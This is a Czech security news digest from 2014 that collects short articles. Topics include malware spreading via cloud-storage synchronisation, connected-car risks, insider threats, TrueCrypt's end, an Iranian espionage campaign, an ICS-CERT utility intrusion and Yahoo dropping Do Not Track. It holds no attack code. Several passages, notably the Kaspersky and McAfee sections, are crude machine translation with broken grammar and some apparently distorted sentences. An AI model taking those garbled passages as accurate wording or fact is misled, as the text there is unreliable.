Také jsme se rozhodli zjistit, jestli zločinci používají Dropbox, OneDrive, Yandex disk nebo Google Disk k šíření malware doopravdy. Shromáždili jsme informace od KSN o instancí malware zjištěných ve složkách cloud-based, které patří k uživatelům produktů společnosti Kaspersky Lab, a zjistil, že infekce, jako jsou tyto byly zjištěny pouze u několika uživatelů: letos v květnu, tak 8700 lidí došlo k infekci v jejich cloud- založené složky. Mezi domácí uživatele produktů společnosti Kaspersky Lab, tyto případy představují pouze 0,42% všech případů malware detekce, a 0,24% pro uživatele firemních produktů.
Měli bychom poukázat na jeden důležitý detail: pokud kus malware je odeslat z jednoho zařízení, budou všechny klienty připojené k infikovaným účtu stáhnout do svého zařízení, a oni budou dělat tak přes HTTPS. I když bezpečnostní řešení detekuje malware ve složce synchronizace a odstraní ji, bude mrak klient, aby stáhnout z mraku v nekonečné smyčce.
Podle dat, která shromažďují, asi 30% malwaru zjištěna v cloudu složkách na domácích počítačích pronikli do těchto počítačů pomocí synchronizačních mechanismů. Pro firemní uživatele, toto číslo dosahuje 50%. To znamená, že infekce mechanismus prokázat Jacob Williams ve své předváděcí malware, to způsobují infekce v reálném životě. Naštěstí jsme se (zatím) zjištěné cílené útoky na trh pomocí ukládání dat cloud-based služeb.
Podíváme-li se do malware, kterou jsme zjistili v cloudu složek v počítačích uživatelů, soubory pro Win32, MSIL, VBS, PHP, JS, Excel, Word a Java ovládat. Je třeba poznamenat, že tam je malý rozdíl mezi firemní a domácí uživatele: pro firemní uživatele, infikované soubory MS Office vyskytují častěji, zatímco domácí uživatelé rovněž čelit jedinečné hrozeb na svých seznamech ve formě škodlivých aplikací pro Android.
TOP 10 verdikty:
Spotřebitel Korporační 1 Email-Worm.Win32.Runouce.b Email-Worm.Win32.Brontok.dam.a 2 Email-Worm.Win32.Brontok.q Virus.Win32.Sality.gen 3 Není-a-virus: AdWare.Win32.RivalGame.kr Virus.Win32.Tenga.a 4 Virus.Win32.Nimnul.a Trojan-Dropper.VBS.Agent.bp 5 Trojan-Clicker.HTML.IFrame.aga Trojan.Win32.Agent.ada 6 Exploit.Win32.CVE-2010-2568.gen Trojan.Win32.MicroFake.ba 7 Virus.Win32.Sality.gen Exploit.Win32.CVE-2010-2568.gen 8 Worm.Win32.AutoRun.dtbv Worm.Win32.AutoRun.dtbv 9 Trojan-Dropper.VBS.Agent.bp Trojan.Win32.Qhost.afes 10 Trojan.Win32.Genome.vqzz Virus.Win32.Nimnul.a Více často než ne, autoři virů použít cloud storage jako místo pro pořádání jejich malware spíše než platformu pro jejich šíření. Během výzkumu jsme nenarazili na jediný červa nebo backdoor (s výjimkou DropSmack) specificky zaměřený úložiště souborů cloudu. Samozřejmě, že tyto služby se snaží bojovat proti malware, který zabírá úložný prostor v cloudu. Kromě hostování malware ovlivňuje pověst službu, ačkoli cloud služby nejsou formálně zodpovědný za to, co jejich klienti soubory nahrát do úložiště. Pravidelné prověřování všech souborů obsažených v oblaku bude samozřejmě vyžadovat mnoho zdrojů, které služby by se spíše používají k ukládání dat.
V důsledku tohoto výzkumu, jsme dospěli k závěru, že existuje relativně nízké riziko podnikové sítě je infikován prostřednictvím cloud storage: po dobu jednoho roku, pouze 1 z 1000 podnikových uživatelů pomocí služby cloudu rizika infekce. Je třeba mít na paměti, nicméně, že v některých případech může dokonce jeden infikovaný počítač v podnikové síti způsobit značné škody.
Zde jsou některá opatření, které mohou být použity pro ochranu podnikových sítí:
Zpřísnit bezpečnostní nastavení Firewall / IDS, blokovat přístup k oblíbeným on-line skladovacích služeb. Velkou nevýhodou tohoto přístupu je, že to vyžaduje neustálé a pečlivé sledování nových kandidátů blacklist, jak se objeví on-line. Nainstalujte víceúčelový Security Suite. Musí obsahovat heuristickou a antivirus chování založené, funkce omezení přístupu (HIPS), nástroj pro kontrolu fungování operačního systému (System Watcher nebo Hypervisor), a nástroj, aby se zabránilo zneužívání zranitelnosti, atd. Jakmile nainstalován, Výrobek musí být pečlivě nakonfigurován. Nezapomeňte, že i nejnáročnější Security Suite je ujít APT útok. Proto je třeba věnovat pozornost, aby kontrolu aplikací (to by měl být nastaven na výchozí popírají). To je možná jeden z nejspolehlivějších nástrojů, které budou blokovat jakýkoliv neznámý software, včetně malwaru šíření během cíleného útoku. Nejtěžším úkolem vznikající při nasazování ovládání aplikace je konfigurace vhodná pravidla tak, aby všechny povolené aplikace mohou být spuštěny a aktualizovány bez problémů. Za tímto účelem, výrobci produktů, které obsahují funkci Control Application vyvinuly specializované nástroje: Aktualizace softwaru prostřednictvím důvěryhodných aktualizace programů, přednastavené programové seznamy povolených včetně všech možných systému a uživatelských souborů, přístup k obrovské cloudových služeb a informačních databází o celé rozmanitosti na bílé listině software. Ve zvláštních případech, Ovládání aplikace by měly být použity k omezení využívání cloudových klientů v rámci podnikové sítě. Pouze důvěryhodní zaměstnanci by měli mít možnost zahájit aplikace, se kterou chcete synchronizovat cloud složky. Co se týče sítí s nejpřísnějšími požadavky na bezpečnost, jako jsou řízení elektráren operace a zásobování vodou, které střeží státní tajemství, nebo ovládají obranných zařízení - pro všechny z nich jsme důkladně nedoporučujeme používat pro ukládání souborů cloud-based služeb vůbec.
Kaspersky: Přes cloudová úložiště lze infikovat podnikové sítě
11.7.2014 Hrozby Společnost Kaspersky Lab analyzovala bezpečnostní rizika cloudových služeb pro firmy. Analytici zejména varují, že přes populární cloudové služby lze infikovat podnikové sítě.
V jednom z možných scénářů se kybernetičtí zločinci zmocní laptopu zaměstnance skrze nainstalovaného dropboxového klienta. Pokud se infikované dokumenty umístí do cloudových složek, Dropbox je automaticky zkopíruje na všechna zařízení připojená do podnikové sítě, která stejnou službu využívají. Dropbox přitom není jediný – všechna rozšířená cloudová úložiště, včetně Microsoft Onedrive (dříve Skydrive) a Google Drive, nabízejí funkce automatické synchronizace.
Podle anonymních dat od uživatelů produktů Kaspersky Lab analytici odhadují, že 30 % malwaru v cloudových složkách proniklo do domácích počítačů pomocí synchronizačních mechanismů. U podnikových uživatelů je to až 50 %. U podnikových uživatelů byly hlavně infikovány soubory Microsoft Office, zatímco na domácích počítačích se kromě toho jednalo o škodlivé aplikace pro Android.
Analýza odhalila, že riziko infekce podnikové sítě tímto způsobem je relativně malé – podobné infekci čelí za rok jeden z tisíce podnikových uživatelů. Nickéně jediný ukradený počítač stačí v tomto případě k napadení celé sítě a způsobení velkých škod.
Jak se bránit? Řešit problém konfigurací firewallu je náročné. Účinnější je podle společnosti Kaspersky Lab instalace plně funkční sady bezpečnostního softwaru, včetně heuristické a behaviorální antivirové ochrany, ovládání přístupu (HIPS), kontroly operačního systému (System Watcher nebo Hypervisor) a ochrany před zneužitím zranitelností na každé pracovní stanici v síti. Doporučuje se i řešení pro řízení a ovládání aplikací.
Jaká jsou rizika propojených aut
9.7.2014 Hrozby Kaspersky Lab a španělská marketingová agentura IAB zveřejnily analýzu First Annual Connected Cars Study: studii o „propojených autech" a bezpečnostních rizicích připojení těchto vozů k internetu.
Koncept „connected cars" dnes neznamená jen o funkce, které uživateli třeba pomohou lépe zaparkovat. Zahrnují nyní i přístup do sociálních sítí, e-mailu, spojení s chytrými telefony, výpočet trasy, zabudované aplikace, apod. Vedle výhod přinášejí i určitá rizika, a proto je třeba analyzovat různé situace, které mohou vést ke kybernetickým útokům nebo podvodnému nakládání s vozidlem.
Chytrá vozidla se podle analytiků stávají terčem podobných útoků, které doposud cílily hlavně na počítače a chytré telefony.
Studie demonstrovala svá zjištění analýzou systému BMW ConnectedDrive:
Odcizená osobní data: Odcizení informací sloužících k přístupu na web BMW pomocí známých metod jako je phishing, odezírání klávesnice (keylogging) nebo sociální inženýrství může vést k neoprávněnému přístupu třetích stran k uživatelským datům a k vozidlu samotnému. Odsud je možné nainstalovat mobilní aplikace se stejnými informacemi a umožnit vzdálené ovládání ještě před otevřením auta a odjezdem s ním.
Mobilní aplikace: Pokud uživatel aktivuje mobilní službu otevření auta, lze bez problémů vytvořit novou sadu klíčů k vozidlu. Pokud tato aplikace není zabezpečená, kdokoli, kdo ukradne telefon, získá přístup k autu. S odcizeným mobilem je možné změnit databázi aplikací a obejít jakékoli ověření pomocí PINu.
Aktualizace: Ovladače Bluetooth jsou aktualizovány stažením souboru z webu BMW a nainstalováním na USB. Tento soubor není ani šifrován, ani podepsán a obsahuje mnoho informací o vnitřním systému, který v autě běží. To může potenciálnímu útočníkovi poskytnout přístup do prostředí, na nějž cílí, a může být změněno tak, aby spustilo škodlivý kód.
Komunikace: Některé funkce komunikují se SIM kartou v autě pomocí SMS. Prolomení tohoto kanálu umožní poslat falešné instrukce. Záleží přitom na úrovni šifrování operátora. V tom nejhorším scénáři může útočník vyměnit komunikační systém BMW za vlastní instrukce a služby.
Skoro polovina lidí si za dolar spustí neznámý program
25.6.2014 Hrozby Lidé bývají ochotni spustit si na počítači leccos, obvykle však z neznalosti – domnívají se například, že zrovna instalují nový kodek. Co zkusit následující experiment: uživatelé by věděli, že pracují s programy potenciálně rizikovými, ale někdo jim za to nabídne peníze.
Přesně do takového pokusu se výzkumníci pustili. Na základě infrastruktury Amazonu se uskutečnil projekt, v jehož rámci si účastníci měli stahovat a instalovat „experimentální software", konkrétně tzv. Distributed Computing Client. Návštěvníci webu projektu byli instruováni, že se stanou součástí výzkumného programu CMU Distributed Computing Project.
Ochota stahovat a spouštět neznámé programy závisela logicky na slíbené odměně, nicméně už při nabídce 1 dolaru se zapojilo 40 % návštěvníků webu (cena se počítala za jednu hodinu provozu programu, každý počítač se směl zúčastnit pouze jednou). Pro peníze si necháme i koleno vrtat. Lidé byli ochotni program spouštět i ručně a výslovně povolovat jeho běh, když se jim zobrazovaly varovné zprávy (např. od komponenty Řízení uživatelských účtů - UAC). Samozřejmě stále věřili, že jde o seriózní projekt, nikoliv zjevný podvod. Výzkumníci uvádějí, že účastníci experimentu vesměs dobře věděli, že riskují a dělají něco, co se jim může vymstít. Závěr pro správce IT a vedení firem z toho je, že uživatele nestačí o rizicích vzdělávat – i s příslušnými znalostmi se lidé dají koupit a s vidinou byť i minimální odměny veškerá pravidla poruší, jindy zase bezpečnostní zásady nebudou dodržovat z pohodlnosti. Bezpečnost by proto měla být maximálně vynucena technickými prostředky a neponechána na lidech. Zajímavé přitom je, že v rámci experimentu byl na řadě zapojených počítačů objeven malware. Drtivá většina strojů měla spuštěný antivirus a další obdobné nástroje, oproti zbytku strojů však právě zabezpečené systémy byly malwarem infikovány pravděpodobněji (!). Jak vyložit toto krajně překvapivé zjištění? Připadali si lidé s antivirem bezpečněji, a proto se chovali riskantněji? Výsledky asi nejsou dány tím, že by se na systémech bez antiviru provozovaly nějaké minimální konfigurace, kdy třeba whitelist zabrání spustit cokoliv – experimentální program zde totiž spustit šel...
Kdo je na světě nejnebezpečnější fotbalista? 17.6.2014 Hrozby Portugalska Cristiano Ronaldo jen stěží hrany z Argentiny Lionel Messi, zatímco svět je nejrizikovější fotbalista vyhledat on-line. Podle výzkumu z McAfee, součást Intel bezpečnosti, rivalita mezi nejlepšími světovými dva hráči se za nimi do McAfee Red Card Club, bratrství jedenácti Brazílie vázaných hráčů, jejichž webové stránky představují největší hrozbu napadení návštěvníkům malwarem . Pozoruhodně top 11 nejrizikovějšími fotbalisté, postrádá anglický uchazeč. Wayne Rooney se ocitl u čísla 15, zatímco Joe Hart, Frank Lampard a Steven Gerrard, byly v bezpečném území u čísla 23 až 25, resp. Jak je běžné u jiných kulturních pocity, zločinci pákový zájem spotřebitelů ve světě nejpopulárnější sport nalákat na webových stránkách opatřeny malware, škodlivého kódu schopného infikovat počítač uživatele a krást hesla a osobní informace. Výzkumníci použili McAfee SiteAdvisor webu hodnocení s cílem určit, které stránky jsou riskantní hledat, když spolu s fotbalisty názvy, které při výpočtu celkové rizikové procento. Podle výzkumu, ventilátory, největší riziko při návštěvě stránek, které nabízejí ke stažení spořiče obrazovky a videa představí mimořádné schopnosti hráči. Vyhledávání na nejnovější obsah Cristiano Ronaldo dává šanci na přistání na stránku, která již pozitivně testován pro on-line hrozbami, jako je spyware, adware, spam, phishing, viry a další malware. English fotbalisté se proto nezdá apelovat na zločinci, stejně jako více úspěšných fotbalových národů. Hráči aby McAfee Red Card Club bodování mezi top jedenáct pozic, pokud jde o největší šanci na webové stránky riziku:
"Zvažte McAfee Red Card Club jako naše úsilí varovat spotřebitele před tím, vášeň Trump digitální hygienu," řekl Raj Samani, EMEA CTO, McAfee, která je součástí Intel bezpečnosti. "Počítačoví zločinci nemohou odolat využívají" horečka-pitch "vzrušení kolem impozantních matchupech tohoto léta v Brazílii. Hrozí nebezpečí, že toto očekávání může vést fanoušci stáhnout obsah ze stránek, které by neměly plnit své fotbalový zážitek. " Tipy, jak zůstat chráněné Aby se zabránilo létě blues z nákazy během Brazílie her a mimo, fanoušci by měl následovat soubor základní tipy, jak chránit sami sebe tam, kde jejich láska hry mohou vzít:
Dejte si pozor na obsahu, který vás vyzve ke stažení nic před poskytnutím vám obsah. Zvažte sledování streamovaného videa nebo stahování obsahu z oficiálních internetových stránkách poskytovatelů obsahu. "Zdarma ke stažení" jsou nejvyšší virus náchylné hledaný výraz. Každý, kdo hledá videa nebo souborů na stažení by měli být opatrní na to rozpoutat malware na svém počítači. Vždy používejte ochranu heslem v telefonu a dalších mobilních zařízení. Pokud je váš telefon ztracen nebo odcizen, může někdo, kdo vyzvedne zařízení vaše osobní data publikovat online. Zavedené zpravodajské servery nemusí lákat vás s exclusives pro jednoho pevného důvodu: tam obvykle nejsou. Snažte se držet oficiálních zpravodajských serverů, kterým důvěřujete pro nejnovější informace. Nicméně, důvěryhodné weby mohou také propadat hackery. Ujistěte se, že používáte bezpečný vyhledávací nástroj, který vám sdělí rizikových míst nebo odkazy, než je navštívíte. Nestahujte videa z podezřelých webů. To by mělo být zdravý rozum, ale to zopakovat: nemusíte nic stahovat z webové stránky nemáte důvěru - zejména videa. Většina novinky klipy byste chtěli vidět, lze snadno nalézt na oficiálních stránkách videa, a nevyžadují ke stažení. Pokud webová stránka nabízí exkluzivní video si můžete stáhnout, ne. Nepoužívejte "přihlásit" nebo poskytnout další informace: Pokud obdržíte zprávu, text nebo e-mailem, nebo navštivte webové stránky třetích stran, které s dotazem na vaše informace, kreditní karty, e-mail, adresu bydliště, Facebook login, nebo jiných informací pro přístup k exkluzivní příběh, nedávají to. Tyto požadavky jsou společné taktika pro phishing, které by mohly vést ke krádeži identity. Pokud se rozhodnete pro vyhledávání informací na významné události nebo osobnosti ve zpravodajství, ujistěte se, že zařízení, celé vaší domácnosti mají ochranu.
Jaké jsou nejlepší bezpečnostní obavy senior IT manažerů? 10.6.2014 Hrozby Většina manažerů C-úrovni by se dohodly, že ochrana důvěrných údajů a obchodních tajemství společnosti před zvědavýma očima konkurentů je kritická. Přesto interaktivní dotazování vedoucích pracovníků bezpečnostních IT na výroční uživatelské konferenci Courion je, ukázal, že 65 procent jsou si vědomi, že jejich společnost zažila pronikání do počítačů, ve kterém byla údajů ukradené, a 55 procent se objevil současný zaměstnanec nebo zasvěcených přičemž informace z počítače společnosti systém pro použití v konkurenčním podniku. Během své prezentaci na konferenci, Assistant US Attorney Kyle F. Waldinger, která stíhat s (CHIP) jednotky Computer Hacking a duševního vlastnictví z úřadu amerického zastupitelství pro severní obvod Kalifornie, prokázaly, prostřednictvím těchto hlasování otázky hrozba, že globální nadnárodní společnosti čelí, a to i od svých vlastních zaměstnanců. Bohužel, současná legislativa dělá to náročné pro federální vláda stíhat potenciální pachatele. A bezpečnost informací a oddělení pro správu identit a přístupu ne vždy společně pracovat na snížení rizika, které vedou k narušení způsobené zasvěcenci, jak bylo zjištěno živé průzkumu provedeného později v konferenci moderátor Jon Oltsik, senior hlavní analytik Enterprise Strategy Group (ESG). Čtrnáct procent identifikovat organizační záležitosti mezi IAM a skupin informační bezpečnosti jsou největší překážkou k větší spolupráci, zatímco 12 procent citované rozpočtové problémy, o 11 procent citované integrace technologické problémy, a devět procent připnul problém na nedostatku kvalifikovaných pracovníků. 47 procent účastníků pocit, že všechny z těchto důvodů představuje výzvu k větší integraci IAM kontrol v rámci bezpečnosti. Nicméně, Oltsik se v případě, že by lepší integraci IAM analýzy se zabezpečením, globálních firem získat přístup ke kontextové kontroly přístupových nutných ke snižování jejich celkový útok povrch a nižší riziko IT. Pomocí IAM Analytics velká zabezpečení dat, nebo identity a přístupu zpravodajských software společnosti jsou lépe vybaveni pro odstranění nikdo nevládne účty a lépe spravovat oddělení povinností (SOD) a privilegovaný přístup k účtu. "Nadnárodní společnosti by mělo být využití IAM analytické velké bezpečnostní údaje podnikem, . nejen s cílem zlepšit jejich schopnost detekovat a reagovat na možné porušení, ale zefektivnit IAM procesy a zlepšit schopnosti dohledu, "řekl Oltsik Ve skutečnosti, nedávná 2014 Verizon dat Porušení Zpráva o incidentu doporučuje následující IAM ovládací prvky:
Znát svá data a kdo má přístup k němu Recenze od uživatele účty Podívejte se na údaje exfiltrace Publikování výsledků auditu. Dále, verze 5 Kritická Bezpečnostní kontroly SANS institutu patří: Řízené používání oprávněními správce Údržba, kontrola a analýza protokolů auditu Monitorování a ovládání účtu Ochrana osobních údajů.
TrueCrypt končí – jaké jsou alternativy?
2.6.2014 Hrozby Pokud pro šifrování svých dat používáte službu TrueCrypt, měli byste začít přemýšlet o přesunu na jiný software, který ochrání vaše soubory i celé disky.
Otevřený a volně dostupný TrueCrypt se stal v posledních deseti letech velmi populárním především díky své nezávislosti na velkých výrobcích. Autoři softwaru ostatně nikdy nebyli veřejně identifikováni. Mezi jeho známé uživatele patřil Edward Snowden a výrazně jej podporoval také bezpečnostní expert Bruce Schneier.
TrueCrypt
Tajemní vývojáři nyní život svého nástroje nečekaně ukončili s odůvodněním, že již nadále není bezpečné jej používat. „Varování: Používání TrueCrypt není bezpečné, protože může obsahovat neopravené bezpečnostní díry,“ píše se na stránce softwaru na serveru SourceForge. Podle analytiků tak uživatelům nezbývá nic jiného než se poohlédnout po nějaké alternativě.
Zpočátku se sice objevily názory, že stránku softwaru napadli kyberzločinci a informace tak není pravdivá. Na SourceForge je však nyní dostupná pouze aktualizovaná verze, která během instalace zobrazí varování doporučující uživatelům přechod na BitLocker nebo jinou alternativu. Tato verze je digitálně podepsána tvůrci TrueCryptu, přičemž je nepravděpodobné, že by neznámý útočník tvůrce identifikoval a ukradl jejich klíč.
TrueCrypt 7.2 mohou uživatelé použít k dešifrování svých dat, nikoliv však k zašifrování nových souborů. Co mohou tedy uživatelé TrueCryptu dělat dál? Na webu softwaru i při instalaci je za vhodnou náhradu označen BitLocker od Microsoftu, který je standardní součástí systémů Vista Ultimate a Enterprise, Windows 7 Ultimate a Enterprise, a Windows 8 Pro a Enterprise.
Vedle BitLockeru jsou tu samozřejmě i další možnosti. Již zmíněný Schneier se prý hodlá vrátit k PGPDisku od Symantecu. Zdarma dostupnou alternativou pro Windows je pak například DiskCryptor. Uživatelé systému Max OS X zase mají k dispozici FileVault 2, který je součástí systému od verze OS X 10.7 (Lion). FileVault se spoléhá na 128bitovou šifru XTS-AES, kterou používají i v NSA. A konečně pro příznivce Linuxu přichází v úvahu Linux Unified Key Setup (LUKS).
Insider hrozby a privilegovaný zneužívání uživatele 30.5.2014 Hrozby Přes zvýšené povědomí o zasvěcených hrozby, většina organizací stále zápasí s tím, jak zmírnit rizika pro jejich sítí a citlivých informací. Podle nové zprávy Raytheon Company, lidé s přístupem k privilegovaným dat - například záznamy zdravotní péče, citlivých informací společnosti, duševního vlastnictví nebo osobní záznamy -. často dát citlivé informace, jejich organizace v ohrožení se zaměřuje na "lidský faktor" zpráva průzkumu, "privilegovaný uživatel Zneužívání a Insider hrozby", zjistí, že mnoho lidí s nejvyššími úrovněmi přístupu k síti v organizacích jsou často umožněn přístup k údajům a oblastí sítě nejsou nezbytné pro jejich role a odpovědnosti. Zpráva ukazuje, že 65% respondentů uvedla, že zvědavost - není práce nezbytnosti -. Řídí tytéž osoby, přístup k citlivým nebo důvěrným údajům "Výsledky tohoto průzkumu by měly sloužit jako budíček pro každého manažera s odpovědností za ochranu společnosti nebo zákazníků citlivé údaje, "řekl Jack Harrington, viceprezident kybernetické bezpečnosti a speciální mise, Raytheon zpravodajské informace a služby. "I když je problém akutně chápat, že řešení nejsou." Pod vedením vedoucího informační bezpečnosti průmyslu Ponemon, komplexní průzkum identifikoval 693 respondenty jako "privilegovaných uživatelů", což znamená, že jsou síťové inženýry, správce databáze, informační a bezpečnostní odborníci a cloud správci. Klíčová zjištění patří:
Osmdesát osm procent rozpoznat zasvěcených hrozby jako důvod k obavám, ale mít obtíže stanovit zvláštní výhružné akce zasvěcenci. Šedesát devět procent dotázaných uvedla, jejich bezpečnostní nástroje neposkytují dostatek kontextových informací k určení záměru za hlášených incidentů a 59 procent je uvedeno jejich nástroje přinést příliš mnoho falešných poplachů. Čtyřicet sedm procent dotazovaných uvedlo, že by bylo pravděpodobné, že se zlými úmysly zasvěcenci by využívat sociální inženýrství nebo jiná opatření k získání přístupových práv něčí - je to až z 21 procent z 2011 průzkumu. Čtyřicet pět procent tvrdí, že je pravděpodobné, že sociální inženýři z vně organizace zaměří privilegovaným uživatelům získat jejich přístupová práva. Co je nejvíce ohroženo: Zatímco 59 procent věří, že obecné obchodní informace je ohrožena, 49 procent říká, informace o zákaznících jsou nejvíce ohroženy v důsledku nedostatku kontroly přístupu nad privilegovaných uživatelů. Padesát sedm procent věří, že kontroly na pozadí chybí ve většině organizací před vydáním privilegovaných pověření. Rozpočet - zatímco 88 procent dotázaných rozpoznat zvýšenou bezpečnost jako nejvyšší prioritu, méně než polovina tohoto množství (40 procent) mají vyhrazený rozpočet na investice do technologií umožňující snížit zasvěcených ohrožení. Většina z nich používá existující kybernetické nástroje, nemusí být nutně určeny k boji proti obchodování zasvěcených hrozbu; 72 procent uvedlo, že používají ověřování a správu identit nástroje pro správu výsadní zneužití uživatele. "Cílem tohoto průzkumu je nejen sdílet aktuálních statistik zasvěcených ohrožení, ale vzdělávat organizace na svých privilegovaných uživatelů a hrozeb a útoků, které mohou nastat v důsledku přístupu, které vlastní," řekl Harrington. "Pokud privilegovaný uživatel chce dělat špatné věci, jejich zvýšené přístup k firemní síti dělá to pro ně jednodušší."
íránský kampaně snooped na amerických úředníků 30.5.2014 Hrozby Íránské špioni provedly shromažďování zpravodajských kampaň nejméně od roku 2011, a to zaměřením americkou armádu, diplomaty, DC novináři a vládní vyslance, jen abychom jmenovali alespoň některé, a přes sociální média.
Podle iSight Partners, počítačové hrozby zpravodajské firmy, útočníci již dlouho byli schopni sbírat přihlásit-in pověření a přístup "a další systémy a informační" přes operaci. Firma vydala zprávu o sofistikované cyberespionage kampaně, přezdívaný hlasatel , dnes.
Kampaň se údajně podařilo sifon e-mailové log-in obětí, síťových protokolů moduly a několik dalších informací, které by mohly být použity další v řadě na sociální inženýrství.
Za účelem koordinace jejich plán, útočníci údajně vyvinuli zabil falešné on-line osobností a převlékl se za reportéry, dodavatelé obrany a politiků. Útočníci kultivovaný těchto Personas přes Facebook, Twitter, LinkedIn, YouTube, Blogger a ano, dokonce i Google+, aby přesvědčil své oběti byly skutečné.
Útočníci také upřesněny Personas přes falešné zpravodajské stránky, Newsonair.org. Články na místě byly přičítány falešných novináři, ale oni byli opravdu zkopírovány z Reuters a dalších legitimních zdrojů. Počet článků na stránce odkazují na citlivých íránských záležitostí, jako jsou jaderné dohody v zemi, vztahy a sankce USA-Írán je uložena na národ.
Poté, co se ujal dobře připojené vůdce a přesvědčil je, že jsou skutečné, útočníci se zaměří na jejich účty s kopí-phishing zpráv, které zachytil log-in informace. Některé zprávy nasazen dat průsaků vody malware na svých počítačích stejně, ale firma tvrdí, že to není příliš sofistikovaná.
Zatím útoky napálil stovky loutky z amerického veřejného a soukromého sektoru. Firma předpokládá, že kolem 2000 cíle jsou, nebo byli, zapleteni do webu kampaně od jejího vzniku.
Seznam těch podvedeni zahrnuje senior americkou armádu, diplomatické a kongresové personál, americký think tanky a dodavatelé obrany, spolu s lobbisty z USA i Izraeli. Další oběti ve Velké Británii a Saúdské Arábie byly také zaměřeny.
iSight nebyl schopen přesně určit, jaký druh dat může být přijata, ale tvrdí, že je to "rozumné předpokládat, že obrovské množství sociálním obsahem byla ohrožena," v systému.
Firma tvrdí, kolektivní cílení, provozní plán a infrastruktura je v souladu s tím íránských útočníků, nacházejících se případně v Teheránu. Dále harmonogram útočníci "se shoduje s normálním íránské rozvrhu práce: Užívání dlouhé přestávky na oběd, půl dne ve čtvrtek a pátek při vypnutí zcela.
Toto je druhá hlavní případ cyberespionage zahrnující Íránce v letošním roce.
Začátkem tohoto měsíce úředníci na FireEye varoval, že hacking skupina, bezpečnostní tým Ajax, se podařilo provést řadu hrdinských činech proti dodavatelů Spojených států obrany, něco, co bezpečnostní firma přezdíval Saffron Rose. Tato kampaň, nicméně, je ne věřil být vázána na zabezpečení týmu Ajax.
Jako útočníků stojí za hlasatel, bezpečnostní tým Ajax použít kombinaci malwaru a sociálního inženýrství provádět své útoky.
Oba příběhy doplní probíhající teorii, že íránští útočné schopnosti množí se bude nadále rozvíjet následující útoky proti nim, jako plamen a Stuxnet.
ICS-CERT Potvrzuje veřejné služby ohrožena Poslední 21.5.2014 Hrozby Útočníci v poslední době ohrožena nástroj ve Spojených státech prostřednictvím počítače připojeného k Internetu, který dal útočníkům přístup k síti Systém vnitřní kontroly utility. Nástroj, který nebyl jmenován, měl vzdálený přístup povolen na některých svých internetových připojených hostitelů a systémy byly chráněny pouze jednoduchými hesly.
Úředníci na ICS-CERT, což je reakce na incidenty a forenzní organizace uvnitř ministerstva vnitřní bezpečnosti, která se specializuje na ICS a SCADA systémů, tento týden řekl, že veřejné služby byla ohrožena ", když sofistikovaný herec hrozba získal neoprávněný přístup do svého řídícího systému sítě . "
Útočník zřejmě používal jednoduché brute-force útok Útočník zřejmě používal jednoduché brute-force útok, abyste získali přístup k internetu-obkladovými systémy na nástroji, a pak ohrožena ICS síť.
"Po oznámení o incidentu, ICS-CERT ověřeny, že software používaný ke správě řídicího systému aktiva byla přístupná přes internet čelí hostitele. Systémy byly nakonfigurovány s možností vzdáleného přístupu, s využitím jednoduchého mechanismu hesla; Nicméně, způsob ověření byl náchylný ke kompromisům pomocí standardních hovado nutit techniky, "řekl ICS-CERT ve zveřejněné zprávě .
Zabezpečení průmyslových řídících systémů a SCADA systémů se stala vážným problémem v posledních letech jako útočníci a výzkumníci začali soustředit svou pozornost na ně. Mnohé z těchto systémů, které ovládají mechanická zařízení, výrobních zařízení, nástrojů, jaderných elektráren a další kritické infrastruktury, jsou připojeni k Internetu, a to buď přímo, nebo prostřednictvím sítě, a to přitahuje k sobě pozornost útočníků, kteří chtějí udělat průzkum nebo způsobit potíže na tyto sítě. Výzkumníci byli ostře kritický k bezpečnosti v SCADA a ICS průmyslu, říká, že je "směšné" a nemá žádnou formální životní cyklus vývoje zabezpečení.
Zpráva ICS-CERT říká, že systémy v ohrožení nástroje byly zřejmě terčem mnoha útoků.
"Bylo zjištěno, že tyto systémy byly pravděpodobně vystaveny četným bezpečnostním hrozbám a předchozí vniknutí aktivita byla také identifikována," uvádí se ve zprávě.
Vyšetřovatelé byli schopni identifikovat problémy a zjistili, že útočníci pravděpodobně neudělal žádnou škodu na ICS systému v nástroji.
Ve stejné zprávě ICS-CERT podrobně samostatný kompromis v organizaci, která řídicí systém připojen k Internetu. Útočníci byli schopni ohrozit ICS systém, který pracuje nespecifikované mechanické zařízení, ale nedělal žádné skutečné škody.
"Zařízení bylo přímo Internet přístupný a nebyl chráněn firewallem nebo kontroly přístupu autentizace. V době kompromisu, řídící systém byl mechanicky odpojen od zařízení pro plánovanou údržbu, "uvádí se ve zprávě.
"ICS-CERT poskytuje analytickou podporu a zjistil, že herec měl přístup k systému po delší dobu a byl připojen přes HTTP a protokol SCADA. Nicméně, další analýza zjistila, že žádné pokusy byly provedeny herec hrozeb manipulovat systém nebo aplikovat neoprávněným kontrolních akcí. "
Yahoo začíná ignorovat žádosti Do Not Track
18.5.2014 Hrozby I když bude mít návštěvník webových služeb Yahoo zapnutou funkci žádající, aby servery nesledovaly jeho aktivity, Yahoo se bude řídit vlastními algoritmy.
Tým Yahoo pro ochranu osobních údajů minulý týden na svém blogu oznámil, že Yahoo začíná ignorovat požadavky „Do Not Track“ návštěvníků. Tuto možnost lze nastavit v internetových prohlížečích a webové servery by potom neměly sledovat chování uživatele.
„V Yahoo se usilovně snažíme poskytovat našim uživatelům prostředí připravené jim přesně na míru,“ napsal tým na blogu. „Spojujeme lidi s tím, co je pro ně nejdůležitější, ve všech zařízeních a po celém světě. Zkrátka jsme přesvědčeni o tom, že nejlepší web je ten na míru.“
Yahoo přitom bylo mezi prvními z velkých webů, které podporu této funkce zaváděly, dalšími jsou například Pinterest nebo Twitter. Protože se jedná o dobrovolnou iniciativu, řada webů ji ignoruje.
Tato změna je jen dalším z kroků v rámci strategie vyhlášené generální ředitelkou Marissou Mayerovou, která razí obraz Yahoo jako „společnosti šité na míru uživateli“. Proto také došlo k přepracování domovské stránky, která nyní obsahuje vlastní informační kanály a cílené reklamy pro každého ze svých uživatelů.
Podle informací o ochraně osobních údajů shromažďuje Yahoo vyhledávání, demografické informace a nastavenou nebo aktuální polohu uživatelů. Díky tomu upravuje nejen zpravodajství, ale i reklamy tak, aby uživatele co nejvíce zaujaly. Tuto funkci je možné vypnout, ale je třeba se nejprve zaregistrovat a přihlásit ze všech používaných zařízení a požádat o deaktivaci vlastních nastavení jednotlivě.
